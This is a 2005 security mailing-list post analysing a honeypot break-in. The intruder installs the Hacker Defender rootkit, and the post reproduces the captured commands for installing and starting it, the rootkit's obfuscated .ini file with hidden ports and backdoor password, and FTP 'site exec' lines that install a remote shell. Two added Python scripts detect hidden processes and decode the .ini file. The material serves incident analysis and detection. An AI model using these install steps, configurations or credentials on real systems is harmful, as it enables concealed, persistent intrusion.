[Intrusions] Hacker Tools/Hacker Defender Packet Capture

David Taylor ltr at isc.upenn.edu
Tue Mar 15 10:13:19 GMT 2005



Hi all,

I set up a VMware Windows XP SP1 (fully patched) machine with weak
passwords and decreased security settings in the hopes of capturing
some traffic from a human unauthorized intrusion.  I got lucky this
weekend and captured some really interesting stuff.  I thought some
of you out there may find this interesting.  Some of you have
probably already done this yourselves.  I shared this with the IT
community at UPENN and they seemed to like it and found it useful, so
I figured I would forward it to all of you.

I created a spreadsheet and matched up the services/processes
'before Hacker Defender and after Hacker Defender'.  If you want to
download it from my site, the link is included in the message below.  I
couldn't find a better way to show the data than using a spreadsheet,
which some might feel uncomfortable opening.

Network Chemistry 'Packetyzer' was used to extract the sessions seen
below.

 >>>Original Message sent to UPENN IT staff<<<

I tried to send the attachment numerous ways but it kept getting
blocked by the listserv software (not anti-virus software) =).  I
have put the spreadsheet on my personal site where you can download
it if you like.

http://www.hackerblaster.com/hackerdefender.xls

If you don't feel comfortable downloading it from my site but still
want to see the spreadsheet, reply to me and I will send it to you
directly.

----------------------------------------------------------------------
This weekend I was lucky enough to capture a great hack session.  The
intruder broke in using the Guest account (Guest had increased
privileges) of my VMware honeypot and planted several hacking tools
(Dameware, RAdmin, Serv-U FTP and Hacker Defender).  They also
attempted to run a security template but the script wasn't modified
properly for it to work.

Some of you may already understand how all of this works, but some may
not.  When I was a sysadmin I always hated it when a computer on my
network got hacked, but even worse was that I could never tell what
they were doing.  I was finding compromised machines and everything
was totally hidden.  It was kind of a mystery to me exactly what they
did when they were inside.  I always wished I could catch them in the
act and watch their every move.

I have a VMware Workstation setup (a virtual machine that houses a real
operating system such as Windows or Linux) running Windows XP
Professional SP1, fully patched.  I have IPsec policies set up to
prevent the machine from scanning other networks for commonly scanned
ports (135, 139, 445, SQL, etc.) in the event an intruder tries to do
so.  I also closely monitor this system just in case.  The passwords
on the Guest and Administrator accounts are guessable by the most
popular scanning/cracking tools.

Below you will find readable text that was extracted from the full
packet capture I performed during this unauthorized intrusion.  I will
try to explain what I see as best I can without going into geeky
technical details.  Those who want more information about this can reply
to me directly.  I felt it was important to share this with you all
so that you can see what happens as well.

Some of this might not make sense but you are seeing it as I see it.
This is not in chronological order. There were over 20,000 packets to
sift through.

-LINKS-
These links may help you better understand the tools below.

Hacker Defender Home
The main page is a discussion of this software.  Very interesting.
No, they don't have a link for you to download it.  =)
This software is 'not' for legitimate use and is pure evil.
http://hxdef.czweb.org/

Remote Admin
Legitimate remote control software often misused by hackers
http://www.radmin.com/

Dameware NT Utilities
Legitimate remote control software often misused by hackers
http://www.dameware.com/

Serv-U Ftp Server
Legitimate FTP server software often misused by hackers
http://www.serv-u.com/


*|*| Capture of the hacker installing Hacker Defender to hide
processes and services.
*|*| This is actually the most exciting thing I observed.  Refer to
the spreadsheet.  The left column is before Hacker Defender was installed
and the right column is after it was installed.  I was also running
NETSTAT at the same time this was going on and noticed the connection
from the IP address of the intruder totally disappeared.  The IP
address was still generating traffic, however.  So, it hid the
services, processes, registry entries and connections that were tied
to the rogue software.


/////////Run Hacker Defender////////
Below, the intruder logged into the honeypot via what appears to be
one of the backdoors installed.  Not sure which one.  A username and
password are entered and a remote command prompt appears on the
intruder's screen.  The intruder then types in NET START to get a
list of currently running services and he/she sees his/her services
running.  The intruder then stops the Remote Admin (r_server) program
(used to remotely access a system to control it) and then restarts
it.  Then the intruder uses FPORT (which was planted earlier by the
intruder) and gets a list of current process-to-port mappings.  All
services and processes are showing up normally.  The intruder then
runs updmgr.exe (Hacker Defender) and then issues the same commands
as earlier.  The processes the intruder planted are now hidden.

I don't see any reason to hide the username/passwords here.  My guess
is most of you don't log into backdoors often.  =)
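
The comparison the spreadsheet makes by hand, as an added Python example that is not part of the original post: it parses two FPort listings and reports the process/port mappings that disappeared between them, and it also compares the host's own listing against what a port scan from another machine sees, which is the check to run when no pre-infection baseline exists. The sample listings and the external-scan result are constructed from the capture below.

```python
import re
from typing import Dict, Iterable, List, Set, Tuple

# One FPort mapping line: "<pid>  <process>  ->  <port>  <proto>  <path>".
# The "(*)" prefix is the marker the post added by hand, and the path is
# optional because System/kernel entries have none and because long paths
# may have been wrapped onto a following line by mail or terminal width.
FPORT_LINE = re.compile(
    r"^\s*(?:\(\*\))?\s*(?P<pid>\d+)\s+(?P<proc>\S+)\s+->\s+"
    r"(?P<port>\d+)\s+(?P<proto>TCP|UDP)\s*(?P<path>\S.*)?$"
)

Mapping = Tuple[int, str, int, str]  # (pid, process, port, proto)


def parse_fport(output: str) -> Dict[Mapping, str]:
    """Return {(pid, process, port, proto): path} for one FPort listing.

    Banner, header, blank and wrapped-path continuation lines do not match
    the pattern and are skipped.
    """
    mappings: Dict[Mapping, str] = {}
    for line in output.splitlines():
        m = FPORT_LINE.match(line)
        if m:
            key = (int(m["pid"]), m["proc"], int(m["port"]), m["proto"])
            mappings[key] = (m["path"] or "").strip()
    return mappings


def vanished_mappings(before: str, after: str) -> List[Mapping]:
    """Mappings present in the earlier listing but missing from the later one.

    With the listings taken either side of the rootkit's installation, this
    is exactly the set of process/port pairs it now hides from the host.
    """
    earlier, later = parse_fport(before), parse_fport(after)
    return sorted(k for k in earlier if k not in later)


def ports_hidden_from_host(local_listing: str,
                           external_open: Iterable[Tuple[int, str]]) -> Set[Tuple[int, str]]:
    """Ports an outside scan sees open that the host's own tools do not list.

    A user-mode rootkit lies to the local API, not to the network, so a scan
    from another machine is the baseline to compare against when no
    pre-infection listing exists.
    """
    local = {(port, proto) for (_, _, port, proto) in parse_fport(local_listing)}
    return set(external_open) - local


# Constructed sample: a subset of the two FPort listings from the capture,
# the first taken before updmgr.exe was started and the second after.
BEFORE = r"""
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.

Pid   Process            Port  Proto Path
876   svchost        ->  135   TCP   C:\WINDOWS\system32\svchost.exe
4     System         ->  139   TCP
988   svchost        ->  3389  TCP   C:\WINDOWS\System32\svchost.exe
(*)3792  mplayer        ->  4899  TCP   C:\Program Files\Windows
Media
Player\mplayer.exe
(*)3456  Tasks          ->  19515 TCP   C:\WINDOWS\system32\Tasks.exe
(*)3456  Tasks          ->  38303 TCP   C:\WINDOWS\system32\Tasks.exe
(*)2984  outlook        ->  65446 TCP   c:\program files\outlook
express\outlook.exe
(*)3792  mplayer        ->  123   UDP   C:\Program Files\Windows
Media
Player\mplayer.exe
(*)3456  Tasks          ->  138   UDP   C:\WINDOWS\system32\Tasks.exe
"""

AFTER = r"""
Pid   Process            Port  Proto Path
876   svchost        ->  135   TCP   C:\WINDOWS\system32\svchost.exe
4     System         ->  139   TCP
988   svchost        ->  3389  TCP   C:\WINDOWS\System32\svchost.exe
"""

# Constructed: what a port scan from a second machine would report as open
# on the honeypot (the rootkit cannot hide listening sockets from the wire).
EXTERNAL_SCAN = {(135, "TCP"), (139, "TCP"), (3389, "TCP"),
                 (4899, "TCP"), (19515, "TCP"), (38303, "TCP"), (65446, "TCP")}


if __name__ == "__main__":
    for pid, proc, port, proto in vanished_mappings(BEFORE, AFTER):
        print(f"hidden after install: pid {pid} {proc} {proto}/{port}")
    for port, proto in sorted(ports_hidden_from_host(AFTER, EXTERNAL_SCAN)):
        print(f"open on the wire but not listed locally: {proto}/{port}")
```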

(*) indicates hacker tools services

......Login:......anlx

Password:......yopyop
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>......net start
net start
......These Windows services are started:

   Automatic Updates
   COM+ Event System
   COM+ System Application
   Cryptographic Services
   DHCP Client
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Error Reporting Service
   Event Log
   Fast User Switching Compatibility
   FTP Publishing
   IIS Admin
   IPSEC Services
   Logical Disk Manager
   Messenger
   (*)ms-off ExportTool
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Portable Media Serial Number
   Print Spooler
   Protected Storage
   (*)RCP SHELL
   (*)Remote Administrator Service
   Remote Procedure Call (RPC)
   Remote Registry
   Secondary Logon
   Security Accounts Manager
   Server
   Shell Hardware Detection
   Simple Mail Transfer Protocol (SMTP)
   SNMP Service
   SSDP Discovery Service
   System Event Notification
   System Restore Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   Terminal Services
   Themes
   VMware Tools Service
   WebClient
   Windows Audio
   Windows Management Instrumentation
   Windows Time
   Wireless Zero Configuration
   Workstation
   World Wide Web Publishing

The command completed successfully.


C:\WINDOWS\system32>......net stop r_server
net stop r_server
......The Remote Administrator Service service is stopping.........V
........
The Remote Administrator Service service was stopped successfully.

......
C:\WINDOWS\system32>......net start r_server
net start r_server
......The Remote Administrator Service service is starting.......
The Remote Administrator Service service was started successfully.

......
C:\WINDOWS\system32>......cd dllcache
cd dllcache
......
C:\WINDOWS\system32\dllcache>......cd..

cd..
w......
C:\WINDOWS\system32>......fport.exe
fport.exe
......FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

(*) indicates hacker tool ports/processes

Pid   Process            Port  Proto Path
1720  inetinfo       ->  21    TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720  inetinfo       ->  25    TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720  inetinfo       ->  80    TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
876   svchost        ->  135   TCP   C:\WINDOWS\system32\svchost.exe
4     System         ->  139   TCP
1720  inetinfo       ->  443   TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
4     System         ->  445   TCP
988   svchost        ->  1025  TCP   C:\WINDOWS\System32\svchost.exe
1720  inetinfo       ->  1026  TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
3064  msdtc          ->  1051  TCP   C:\WINDOWS\System32\msdtc.exe
0     System         ->  1233  TCP
988   svchost        ->  3389  TCP   C:\WINDOWS\System32\svchost.exe
(*)3792  mplayer        ->  4899  TCP   C:\Program Files\Windows Media Player\mplayer.exe
1148  svchost        ->  5000  TCP   C:\WINDOWS\System32\svchost.exe
(*)3456  Tasks          ->  19515 TCP   C:\WINDOWS\system32\Tasks.exe
(*)3456  Tasks          ->  38303 TCP   C:\WINDOWS\system32\Tasks.exe
(*)2984  outlook        ->  65446 TCP   c:\program files\outlook express\outlook.exe
(*)3792  mplayer        ->  123   UDP   C:\Program Files\Windows Media Player\mplayer.exe
3064  msdtc          ->  123   UDP   C:\WINDOWS\System32\msdtc.exe
1720  inetinfo       ->  135   UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
1148  svchost        ->  137   UDP   C:\WINDOWS\System32\svchost.exe
(*)3456  Tasks          ->  138   UDP   C:\WINDOWS\system32\Tasks.exe
1720  inetinfo       ->  161   UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720  inetinfo       ->  445   UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
876   svchost        ->  500   UDP   C:\WINDOWS\system32\svchost.exe
1720  inetinfo       ->  1027  UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
4     System         ->  1031  UDP
988   svchost        ->  1034  UDP   C:\WINDOWS\System32\svchost.exe
(*)2984  outlook        ->  1900  UDP   c:\program files\outlook express\outlook.exe
988   svchost        ->  1900  UDP   C:\WINDOWS\System32\svchost.exe
1720  inetinfo       ->  3456  UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe

......
C:\WINDOWS\system32>............cd dllcache
cd dllcache
......
C:\WINDOWS\system32\dllcache>......updmgr.exe -:installonly
updmgr.exe -:installonly
......
C:\WINDOWS\system32\dllcache>......updmgr.exe -:refresh
updmgr.exe -:refresh
......
C:\WINDOWS\system32\dllcache>......net start updmgr
net start updmgr
......The Automatic Updates Manager service is starting.......
The Automatic Updates Manager service was started successfully.

......
C:\WINDOWS\system32\dllcache>......net start
net start
......These Windows services are started:

   Automatic Updates
   COM+ Event System
   COM+ System Application
   Cryptographic Services
   DHCP Client
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Error Reporting Service
   Event Log
   Fast User Switching Compatibility
   FTP Publishing
   IIS Admin
   IPSEC Services
   Logical Disk Manager
   Messenger
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Portable Media Serial Number
   Print Spooler
   Protected Storage
   Remote Procedure Call (RPC)
   Remote Registry
   Secondary Logon
   Security Accounts Manager
   Server
   Shell Hardware Detection
   Simple Mail Transfer Protocol (SMTP)
   SNMP Service
   SSDP Discovery Service
   System Event Notification
   System Restore Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   Terminal Services
   Themes
   VMware Tools Service
   WebClient
   Windows Audio
   Windows Management Instrumentation
   Windows Time
   Wireless Zero Configuration
   Workstation
   World Wide Web Publishing

The command completed successfully.


C:\WINDOWS\system32\dllcache>......cd..

cd..
W......
C:\WINDOWS\system32>......fport.exe
fport.exe
......FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid   Process            Port  Proto Path
1720  inetinfo       ->  21    TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720  inetinfo       ->  25    TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720  inetinfo       ->  80    TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
876   svchost        ->  135   TCP   C:\WINDOWS\system32\svchost.exe
4     System         ->  139   TCP
1720  inetinfo       ->  443   TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
4     System         ->  445   TCP
988   svchost        ->  1025  TCP   C:\WINDOWS\System32\svchost.exe
1720  inetinfo       ->  1026  TCP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
3064  msdtc          ->  1051  TCP   C:\WINDOWS\System32\msdtc.exe
0     System         ->  1233  TCP
0     System         ->  1236  TCP
988   svchost        ->  3389  TCP   C:\WINDOWS\System32\svchost.exe
1148  svchost        ->  5000  TCP   C:\WINDOWS\System32\svchost.exe

3064  msdtc          ->  123   UDP   C:\WINDOWS\System32\msdtc.exe
1148  svchost        ->  123   UDP   C:\WINDOWS\System32\svchost.exe
1720  inetinfo       ->  135   UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
4     System         ->  137   UDP
4     System         ->  138   UDP
1720  inetinfo       ->  161   UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
1720  inetinfo       ->  445   UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
876   svchost        ->  500   UDP   C:\WINDOWS\system32\svchost.exe
1720  inetinfo       ->  1027  UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe
4     System         ->  1031  UDP
988   svchost        ->  1034  UDP   C:\WINDOWS\System32\svchost.exe
0     System         ->  1900  UDP
988   svchost        ->  1900  UDP   C:\WINDOWS\System32\svchost.exe
1720  inetinfo       ->  3456  UDP   C:\WINDOWS\System32\inetsrv\inetinfo.exe

......
C:\WINDOWS\system32>......exit

exit


*|*| Hacker Defender .INI file

[">"">>""H<<<">>>idden T>>a>"ble]

>>"">>h>"">>xd>"">>ef>"">>100.exe
>>"">>h>"">>xd>"">>ef>"">>100.ini

r_server*
radmin*
AdmDll.dll
raddrv.dll
radmin.reg
instal.bat
mplayer.exe
outlook.exe
systemspool.dll
windowsshells32.dll
Tasks.exe
DWRCS*
DNTUS26.EXE
restore
lol
updmgr.exe
updmgr.ini
updmgr*

""[:"\:R":o:o\:t: :P:r>:o:c<:e:"s:s:"e<:s":>]

/[/H/idd\en Ser:vi"ces]
Ha>:ck"er//Def\ender*
HXD Service 100
DameWare*
DNTUS26
DWMRCS
UpdMgr
Automatic Updates Manager
r_server
Remote Administrator Service
Windows Media Player
ms-off
ms-off*
Server Management
rpcxshell
RCP SHELL
Outlook

[Hi:dden R/">>egKeys]
UpdMgr
LEGACY_UpdMgr
UpdMgrDrv
LEGACY_UpdMgrDrv
            /
\"[Hid:den\> :RegValues]"""
             ////
:[St/\artup\ Run/]

":[\Fr<ee>> S:"<pa>ce]


"[>H<i>d"d:en<>\ P/:or:t<s"]\:
TCP:19515,38303,4899,65446
UDP:19515,38303,4899,65446

[Set/tin/:\gs]  /
P:assw\ord=yopyop
Ba:ckd:"oor"Shell=hxdef.$.exe
Fil:eMappin\gN/ame=_.-=[UpdMgr]=-._
Serv:iceName=UpdMgr

>Se|rvi:ceDisp<://la"yName=Automatic Updates Manager

Ser>vic:eD||escr<ip:t"ion=provides Automatic Windows Updates
Dri<ve\rN:ame=UpdMgrDrv
D:riv>erFileNam/e=updmgrsvc.sys


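Hacker Defender's .ini parser ignores the characters | < > : \ / and " (the list is from the hxdef readme), so the scrambled headers above read as [Hidden Table], [Root Processes], [Hidden Services] and so on once those characters are dropped. The following Python normaliser is an added example, not part of the original post or of the rootkit: it strips that noise and pulls out the hidden ports, service names and settings so they can be used as host indicators. How the real parser treats the port lines is my assumption (prefix match after stripping), and the sample file is a constructed subset of the capture above.

```python
import re
from typing import Dict, List

# Characters Hacker Defender's .ini parser ignores (listed in the hxdef
# readme); scattering them through the file defeats naive string matching,
# which is why the capture above looks scrambled.
IGNORED = set('|<>:\\/"')

# Assumption: a [Hidden Ports] line is "<prefix><ports>" once the noise is
# gone, covering the "TCP:" form in this capture and "TCPI:"/"TCPO:" forms.
PORT_LINE = re.compile(r"^(TCPI|TCPO|TCP|UDP)\s*([\d,\s]*)$")


def normalise_line(raw: str) -> str:
    """Drop the ignored characters and surrounding whitespace."""
    return "".join(ch for ch in raw if ch not in IGNORED).strip()


def parse_hxdef_ini(text: str) -> Dict[str, List[str]]:
    """Return {section name: [entries]} with the noise characters removed."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = normalise_line(raw)
        if not line:
            continue  # blank or pure-noise line
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def hidden_ports(text: str) -> Dict[str, List[int]]:
    """Port lists from [Hidden Ports], keyed by protocol prefix."""
    ports: Dict[str, List[int]] = {}
    for entry in parse_hxdef_ini(text).get("Hidden Ports", []):
        m = PORT_LINE.match(entry)
        if m:
            ports[m.group(1)] = [int(p) for p in m.group(2).split(",") if p.strip()]
    return ports


def settings(text: str) -> Dict[str, str]:
    """key=value pairs from [Settings] (service name, driver file, ...)."""
    result: Dict[str, str] = {}
    for entry in parse_hxdef_ini(text).get("Settings", []):
        key, sep, value = entry.partition("=")
        if sep:
            result[key.strip()] = value.strip()
    return result


# Constructed sample: a subset of the updmgr.ini lines from the capture.
SAMPLE_INI = r'''
[">"">>""H<<<">>>idden T>>a>"ble]
>>"">>h>"">>xd>"">>ef>"">>100.exe
r_server*
mplayer.exe
Tasks.exe
updmgr*

""[:"\:R":o:o\:t: :P:r>:o:c<:e:"s:s:"e<:s":>]

/[/H/idd\en Ser:vi"ces]
Ha>:ck"er//Def\ender*
UpdMgr
Automatic Updates Manager
RCP SHELL

[Hi:dden R/">>egKeys]
UpdMgr
LEGACY_UpdMgr

"[>H<i>d"d:en<>\ P/:or:t<s"]\:
TCP:19515,38303,4899,65446
UDP:19515,38303,4899,65446

[Set/tin/:\gs]  /
P:assw\ord=yopyop
Serv:iceName=UpdMgr
 >Se|rvi:ceDisp<://la"yName=Automatic Updates Manager
D:riv>erFileNam/e=updmgrsvc.sys
'''


if __name__ == "__main__":
    for name, entries in parse_hxdef_ini(SAMPLE_INI).items():
        print(f"[{name}]")
        for entry in entries:
            print("   ", entry)
    print("hidden ports:", hidden_ports(SAMPLE_INI))
    print("service shown as:", settings(SAMPLE_INI).get("ServiceDisplayName"))
```

The hidden file patterns, service display name and driver file name are the strings a clean-boot or offline scan of the disk and registry should look for, since the running system will not report them.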
*Serv-U was logged into by the attacker
............220 Serv-U FTP Server v3.0 for WinSock ready...
AUTH M
530 Not logged in.
USER admin
331 User name okay, need password.
PASS lol
230 User logged in, proceed.
SITE MAINTENANCE
230-Switching to SYSTEM MAINTENANCE mode.
......230 Version=1
900-Type=Status
900 Server=Online
900-Type=License
900-DaysLeft=2986
900-Status=KeyValid
900-CurAccounts=1
900-MaxAccounts=-1
900-CurDomains=1
900-MaxDomains=-1
900-MaxNrUsers=-1
900-VirPath=1
900-DiskQuota=1
900-Ratios=1
900-RemoteAdmin=1
900-Version=3.0.0.17
900-RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagAAAyQnyD
5CDgL/DmNob3VwQGNob3Vwc3NzBG15bmULocalSetupPassword=072C63105200180D5C
07170A7E3E
900-User=choup at choupsss
900-EMail=myne
900-Reseller=
900-Time=1053304612
900-Type=65282
900-Size=1
900-Days=3650
900-MajorVersion=3
900 MinorVersion=0
GETDOMAINLIST
200 Domain=FuCkYoUaLL|0.0.0.0|19515|1|1|0|1
GETSTATUSINFO
200-StatBandwidth=45
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0
...... GETSERVERSETUP
200-Security=1
......200-AntiHammer=0
200-EncryptPasswords=1
200-CheckAnonPass=0
200-DeletePartialUploads=0
200-LowerCaseFileDir=0
200-BlockAntiTimeOut=0
200-BlockFTPBounceAttack=0
200-DirCacheEnable=1
200-PacketTimeOutDynamic=1
200-SocketInlineOOB=0
200-SocketKeepAlive=0
200-SocketNoNagle=0
200-PASVPortStart=0
200-PASVPortRange=0
200-MaxNrUsers=-1
200-DirCacheSize=25
200-DirCacheTime=600
200-OpenFilesUploadMode=0
200-OpenFilesDownloadMode=0
200-AntiHammerWindow=30
200-AntiHammerTries=4
200-AntiHammerBlock=300
200-SocketRcvBuffer=65535
200-SocketSndBuffer=65535
200-PacketTimeOut=300
200-SpeedLimit=1536000
200 DirListMask=rw-rw-rw-
GETDIRCACHEINFO
200 CacheHitRatio=0
...... GETSTATUSINFO
200-StatBandwidth=45
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0
...... GETSTATUSINFO
200-StatBandwidth=45
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0
...... GETSTATUSINFO
200-StatBandwidth=0
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0
SETSERVERSETUP
-SpeedLimit=-1
-MaxNrUsers=-1
-AntiHammerTries=4
-AntiHammerWindow=30
-AntiHammerBlock=300
-AntiHammer=0
-EncryptPasswords=1
-CheckAnonPass=0
-DeletePartialUploads=0
-LowerCaseFileDir=0
-BlockAntiTimeOut=0
-BlockFTPBounceAttack=0
-DirCacheEnable=1
-DirCacheSize=25
-DirCacheTime=600
-OpenFilesUploadMode=0
-OpenFilesDownloadMode=0
-SocketRcvBuffer=65535
-SocketSndBuffer=65535
-PacketTimeOut=300
-Security=1
-PacketTimeOutDynamic=1
-SocketInlineOOB=0
-SocketKeepAlive=1
-SocketNoNagle=1
-DirListMask=rw-rw-rw-
-PASVPortStart=0
-PASVPortRange=0
-CertCommon=
-CertEmail=
-CertCity=
-CertState=
-CertCountry=
-CertOrganization=
CertOrgUnit=
220 Server settings saved
...... GETSTATUSINFO
200-StatBandwidth=0
......200-StatMaxSockets=32767
200-StatCurSockets=3
200-StatTransfers=0
200-StatMaxUsers=-1
200-StatTotalUsers=1
200 StatAnonUsers=0



*|*|Capture of FTP commands
Here the intruder is testing out the directories (from a different IP
address than the original attacker).  You can see the famous
C:\RECYCLER and C:\System Volume Information folders.  It seems that
they uploaded a test file to the VMware honeypot to do a speed test.

220 Serv-U FTP Server v3.0 for WinSock ready...
USER admin
331 User name okay, need password.
PASS lol
230 User logged in, proceed.
SYST
215 UNIX Type: L8
FEAT
500 'FEAT': command not understood.
PWD

257 "/c:" is current directory.
TYPE A
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,172) (ip cleansed)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....CWD RECYCLER
250 Directory changed to /c:/RECYCLER
PWD

257 "/c:/RECYCLER" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,173)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....SIZE 05MB
550 /c:/RECYCLER/05MB: No such file.
S.....TYPE I
200 Type set to I.
S.....PORT second-intruder-ip,162,108
200 PORT Command successful.
STOR 05MB
150 Opening BINARY mode data connection for 05MB.
S.....226 Transfer complete.
S.....TYPE A
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,174)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....DELE 05MB
250 DELE command successful.
PASV
227 Entering Passive Mode (0,0,0,0,4,175)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....CDUP
250 Directory changed to /c:
PWD

257 "/c:" is current directory.
S.....CWD Program Files
250 Directory changed to /c:/Program Files
PWD

257 "/c:/Program Files" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,176)
S.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
S.....CWD Windows Media Player
250 Directory changed to /c:/Program Files/Windows Media Player
PWD

257 "/c:/Program Files/Windows Media Player" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,177)
M.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
M.....TYPE I
200 Type set to I.
SIZE AdmDll.dll
550 /c:/Program Files/Windows Media Player/AdmDll.dll: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,178)
STOR AdmDll.dll
150 Opening BINARY mode data connection for AdmDll.dll.
M.....226 Transfer complete.
TYPE A
200 Type set to A.
SIZE Instal.bat
550 /c:/Program Files/Windows Media Player/Instal.bat: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,179)
M.....STOR Instal.bat
150 Opening ASCII mode data connection for Instal.bat.
226 Transfer complete.
M.....TYPE I
200 Type set to I.
SIZE mplayer.exe
550 /c:/Program Files/Windows Media Player/mplayer.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,180)
STOR mplayer.exe
150 Opening BINARY mode data connection for mplayer.exe.
L.....226 Transfer complete.
L.....SIZE raddrv.dll
550 /c:/Program Files/Windows Media Player/raddrv.dll: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,182)
L.....STOR raddrv.dll
150 Opening BINARY mode data connection for raddrv.dll.
L.....226 Transfer complete.
L.....SIZE radmin.reg
550 /c:/Program Files/Windows Media Player/radmin.reg: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,183)
L.....STOR radmin.reg
150 Opening BINARY mode data connection for radmin.reg.
226 Transfer complete.
L.....L.....TYPE A
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,184)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
L.....CDUP
250 Directory changed to /c:/Program Files
PWD

257 "/c:/Program Files" is current directory.
F.....CWD Outlook Express
250 Directory changed to /c:/Program Files/Outlook Express
PWD

257 "/c:/Program Files/Outlook Express" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,186)
F.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
F.....TYPE I
200 Type set to I.
SIZE outlook.exe
550 /c:/Program Files/Outlook Express/outlook.exe: No such file.
PASV
227 Entering Passive Mode (0,0,0,0,4,187)
F.....STOR outlook.exe
150 Opening BINARY mode data connection for outlook.exe.
F.....226 Transfer complete.
TYPE A
200 Type set to A.
200 Type set to A.
PASV
227 Entering Passive Mode (0,0,0,0,4,188)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
F.....site exec outlook.exe /u anlx /pw yopyop /p 65446 /install
200 EXEC command successful (TID=33).
F.....site exec net start rpcxshell
200 EXEC command successful (TID=33).
F.....PASV
227 Entering Passive Mode (0,0,0,0,4,189)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
E.....CWD /c:/
250 Directory changed to /c:
PWD

257 "/c:" is current directory.
E.....CWD /e:/
250 Directory changed to /e:
PWD

257 "/e:" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,190)
E.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
E.....CWD System Volume Information
250 Directory changed to /e:/System Volume Information
PWD

257 "/e:/System Volume Information" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,191)
E.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
E.....CWD _restore{08813AA2-64F0-4666-9648-E10E0A8DEA02}
250 Directory changed to /e:/System Volume Information/_restore{08813AA2-64F0-4666-9648-E10E0A8DEA02}
PWD

257 "/e:/System Volume Information/_restore{08813AA2-64F0-4666-9648-E10E0A8DEA02}" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,192)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
?.....CDUP
250 Directory changed to /e:/System Volume Information
PWD

257 "/e:/System Volume Information" is current directory.
?.....CDUP
250 Directory changed to /e:
PWD

257 "/e:" is current directory.
?.....CWD RECYCLER
250 Directory changed to /e:/RECYCLER
PWD

257 "/e:/RECYCLER" is current directory.
PASV
227 Entering Passive Mode (0,0,0,0,4,193)
?.....LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
?.....CWD S-1-5-21-1960408961-1409082233-1417001333-1001
250 Directory changed to /e:/RECYCLER/S-1-5-21-1960408961-1409082233-1417001333-1001
